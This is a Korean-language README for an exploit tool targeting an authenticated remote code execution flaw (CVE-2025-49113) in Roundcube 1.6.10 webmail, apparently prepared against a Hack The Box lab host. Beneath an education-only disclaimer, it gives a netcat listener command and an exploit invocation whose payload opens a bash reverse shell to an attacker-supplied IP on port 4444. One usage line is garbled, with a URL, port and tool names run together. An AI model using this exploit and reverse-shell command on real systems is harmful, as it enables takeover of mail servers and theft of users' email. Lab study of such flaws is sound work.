
Roundcube 1.6.10(CVE-2025-49113)용 인증된 원격 코드 실행 익스플로잇. 웹메일 인터페이스를 통해 특수 제작된 PHP 페이로드로 리버스 셸을 전달합니다.
⚠️ 면책 조항
이 저장소는 교육 및 연구 목적으로만 사용됩니다.
모든 시연은 통제된 실험실 환경에서 수행되었습니다.
명시적 허가 없이 시스템을 무단 테스트하거나 악용하는 것은 불법이며 비윤리적입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.
Roundcube는 PHP로 작성된 널리 사용되는 브라우저 기반 IMAP 이메일 클라이언트입니다. 웹메일 접근을 위한 사용자 친화적인 인터페이스를 제공하며, 호스팅 제공업체, 학술 기관 및 내부 엔터프라이즈 메일 서버에서 일반적으로 배포됩니다.
CVE-2025-49113은 Roundcube 버전 1.6.10에 영향을 미치는 취약점으로, 인증된 사용자가 웹메일 인터페이스를 통해 조작된 명령을 제출하여 원격 코드 실행(RCE)을 달성할 수 있게 합니다.
성공적인 악용에는 유효한 사용자 자격 증명이 필요합니다. 악용에 성공하면 웹 서버의 컨텍스트를 기반으로 시스템 수준의 명령 실행이 가능합니다.
http://mail.outbound.htb4444의 NetcatCVE-2025-49113.phpnc -nlvp 4444
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
🔧
<YOUR-IP>를 공격자의 IP로 교체하세요.


제 Medium 게시물에서 상세한 분석과 이론을 확인하세요:
👉 Medium에서 블로그 읽기